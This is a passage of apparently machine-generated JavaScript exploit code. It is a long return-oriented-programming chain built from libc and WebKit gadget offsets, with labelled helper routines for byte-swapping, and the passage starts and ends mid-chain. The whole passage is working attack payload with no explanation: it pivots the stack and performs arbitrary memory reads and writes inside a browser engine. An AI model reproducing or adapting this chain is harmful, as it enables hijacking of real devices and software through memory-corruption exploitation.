libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+142896, //L1951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L1951:
db([0, 0]); // 0x0
//___bswap64_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+142968, //L1953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1953:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143064, //L1954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+143096, //L1957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1956:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L1957:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+143200, //L1960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+143184, //L1958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1958:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1960:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+143312, //L1961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143344, //L1963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143328, //L1962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1961:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1962:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1963:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143448, //L1964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143464, //L1965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1964:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143584, //L1966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143568, //L1967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1967:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1966:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+143672, //L1969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143656, //L1968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1969:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143776, //L1970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143792, //L1971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1970:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143912, //L1972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143896, //L1973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1973:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1972:
db([0, 0]); // 0x0
//___bswap32_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143984, //L1975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+144080, //L1976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144112, //L1979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1976:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1978:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L1979:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+144216, //L1982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144200, //L1980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1980:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+144392, //L1985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144408, //L1986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144360, //L1983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+144376, //L1984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1983:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1984:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1985:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1986:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+144568, //L1990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+144536, //L1988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+144552, //L1989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1987:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L1988:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1989:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1990:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+144688, //L1991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144720, //L1993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+144704, //L1992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1991:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1992:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+144824, //L1994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144840, //L1995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1994:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1995:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+144960, //L1996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144944, //L1997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1997:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+145048, //L1999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+145032, //L1998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1998:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1999:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145152, //L2000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145168, //L2001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2000:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2001:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145288, //L2002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145272, //L2003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2003:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2002:
db([0, 0]); // 0x0
//___bswap16_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145360, //L2005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2005:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+145456, //L2006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145488, //L2009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2006:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2008:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L2009:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+145592, //L2012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145576, //L2010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2010:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2012:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+145752, //L2016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145720, //L2014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+145736, //L2015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2013:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L2014:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2015:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2016:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+145808, //L2018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2018:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+145936, //L2020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145952, //L2021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+145920, //L2019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2019:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2020:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2021:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+146112, //L2025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146080, //L2023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146096, //L2024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2022:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2023:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2024:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2025:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+146216, //L2027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146200, //L2026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2026:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2027:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2028:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L2029:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+146424, //L2032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146408, //L2031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2030:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2031:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2032:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+146528, //L2034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146512, //L2033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2033:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2034:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+146608, //L2035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2035:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2037:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+146728, //L2040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+146712, //L2038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2038:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+146888, //L2044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+146856, //L2042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146872, //L2043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2041:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L2042:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2043:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2044:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+146944, //L2046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+147072, //L2048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+147088, //L2049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147056, //L2047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2047:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2048:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2049:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+147248, //L2053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147216, //L2051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147232, //L2052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2050:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2051:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2052:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2053:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147352, //L2055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147336, //L2054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2054:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2055:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2056:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L2057:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+147552, //L2060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147536, //L2059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2058:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L2059:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2060:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147656, //L2062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147640, //L2061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2061:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2062:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147768, //L2065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147752, //L2064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2063:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2064:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2065:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147832, //L2067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+763368 //pop rcx
]);
//L2067:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+147888, //L2068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2068:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+148040, //L2071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148056, //L2072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+148024, //L2070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2070:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2071:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2072:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+148216, //L2076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+148184, //L2074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+148200, //L2075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2073:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2074:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2075:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+148336, //L2077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148368, //L2079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+148352, //L2078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2077:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2078:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148472, //L2080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148488, //L2081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2080:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2081:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148608, //L2082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148592, //L2083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2083:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2082:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+148696, //L2085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+148680, //L2084
